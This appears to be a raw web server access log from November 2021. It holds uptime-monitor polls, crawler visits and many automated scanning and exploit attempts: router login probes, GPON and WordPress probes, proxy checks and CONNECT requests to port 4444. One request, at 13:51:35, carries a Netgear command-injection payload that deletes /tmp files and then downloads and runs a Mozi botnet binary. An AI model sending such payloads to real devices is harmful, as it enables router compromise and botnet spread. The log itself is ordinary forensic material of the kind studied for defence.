212.91.246.72 - - [01/Nov/2021:13:02:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.54.186 - - [01/Nov/2021:13:03:52 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:13:03:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:04:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:05:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:06:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
161.156.29.33 - - [01/Nov/2021:13:07:58 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)"
161.156.29.33 - - [01/Nov/2021:13:07:58 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)"
161.156.29.33 - - [01/Nov/2021:13:07:58 +0100] "GET /scripte/all_scripts.js HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://www.xforce-security.com/crawler/)"
212.91.246.72 - - [01/Nov/2021:13:07:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:08:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.149.251.133 - - [01/Nov/2021:13:09:50 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [01/Nov/2021:13:09:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:10:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
102.176.73.27 - - [01/Nov/2021:13:11:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:11:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:12:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:13:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.143.32.6 - - [01/Nov/2021:13:14:18 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
212.91.246.72 - - [01/Nov/2021:13:14:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:15:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
13.67.53.180 - - [01/Nov/2021:13:17:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:24 +0100] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:25 +0100] "GET /xmlrpc.php?rsd HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:25 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:25 +0100] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:25 +0100] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:25 +0100] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:26 +0100] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:26 +0100] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:26 +0100] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:26 +0100] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:26 +0100] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:27 +0100] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:27 +0100] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:33 +0100] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:33 +0100] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:34 +0100] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:34 +0100] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:34 +0100] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
13.67.53.180 - - [01/Nov/2021:13:17:34 +0100] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:17:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:18:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.24 - - [01/Nov/2021:13:19:38 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:19:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:20:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:21:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.24 - - [01/Nov/2021:13:22:52 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.53.90.24 - - [01/Nov/2021:13:22:56 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:22:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.113.41 - - [01/Nov/2021:13:23:58 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:13:23:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:24:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:25:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.24 - - [01/Nov/2021:13:26:59 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:26:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.193.61.111 - - [01/Nov/2021:13:27:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:27:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:28:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.98.56.220 - - [01/Nov/2021:13:29:42 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:13:29:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:30:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:31:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:32:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.24 - - [01/Nov/2021:13:33:56 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:33:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:34:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.24 - - [01/Nov/2021:13:35:23 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.53.90.24 - - [01/Nov/2021:13:35:57 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.53.90.24 - - [01/Nov/2021:13:35:57 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:35:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.47 - - [01/Nov/2021:13:36:03 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
45.61.184.37 - - [01/Nov/2021:13:36:09 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
209.141.51.171 - - [01/Nov/2021:13:36:21 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
49.50.87.89 - - [01/Nov/2021:13:36:56 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
49.50.87.89 - - [01/Nov/2021:13:36:57 +0100] "HEAD / HTTP/1.1" 200 - "-" "-"
185.53.90.24 - - [01/Nov/2021:13:36:59 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:36:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
49.50.87.89 - - [01/Nov/2021:13:37:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
49.50.87.89 - - [01/Nov/2021:13:37:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
95.106.166.134 - - [01/Nov/2021:13:37:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:37:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:38:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:39:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:40:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:41:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
36.112.138.64 - - [01/Nov/2021:13:42:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Nov/2021:13:42:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:43:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:44:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
147.189.145.220 - - [01/Nov/2021:13:45:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2021:13:45:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:46:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:47:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.134.170 - - [01/Nov/2021:13:48:13 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:48:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.53.90.24 - - [01/Nov/2021:13:49:33 +0100] "GET http://azenv.net/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2021:13:49:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:50:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
222.247.120.253 - - [01/Nov/2021:13:51:35 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
212.91.246.72 - - [01/Nov/2021:13:51:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:52:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
186.33.116.224 - - [01/Nov/2021:13:53:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:53:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.53 - - [01/Nov/2021:13:54:48 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
212.91.246.72 - - [01/Nov/2021:13:54:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.46 - - [01/Nov/2021:13:55:09 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
212.91.246.72 - - [01/Nov/2021:13:55:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.46 - - [01/Nov/2021:13:56:02 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
212.91.246.72 - - [01/Nov/2021:13:56:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
8.142.89.87 - - [01/Nov/2021:13:57:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2021:13:57:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.100.76.195 - - [01/Nov/2021:13:58:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:13:58:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:13:59:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.113.41 - - [01/Nov/2021:14:00:16 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:14:00:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.134.225.15 - - [01/Nov/2021:14:01:04 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:14:01:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:02:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:03:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:04:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.53 - - [01/Nov/2021:14:05:38 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
212.91.246.72 - - [01/Nov/2021:14:05:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:06:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.46 - - [01/Nov/2021:14:07:39 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
203.76.113.45 - - [01/Nov/2021:14:07:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:14:07:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2021:14:08:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.46 - - [01/Nov/2021:14:09:07 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
59.95.85.52 - - [01/Nov/2021:14:09:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:14:09:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.120.103 - - [01/Nov/2021:14:10:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [01/Nov/2021:14:10:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.47 - - [01/Nov/2021:14:11:27 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
212.91.246.72 - - [01/Nov/2021:14:11:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.93.250.46 - - [01/Nov/2021:14:12:06 +0100] "CONNECT 45.93.250.59:4444 HTTP/1.1" 405 343 "-" "-"
205.185.113.41 - - [01/Nov/2021:14:12:21 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:14:12:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.222.228.249 - - [01/Nov/2021:14:13:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/84.0.4147.105 Safari/537.36"
18.222.228.249 - - [01/Nov/2021:14:13:06 +0100] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/2W6Px8S) Chrome/84.0.4147.105 Safari/537.36"
128.14.141.34 - - [01/Nov/2021:14:13:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Nov/2021:14:13:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.51.171 - - [01/Nov/2021:14:14:55 +0100] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.88:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.246.72 - - [01/Nov/2021:14:14:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.27 - - [01/Nov/2021:14:15:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
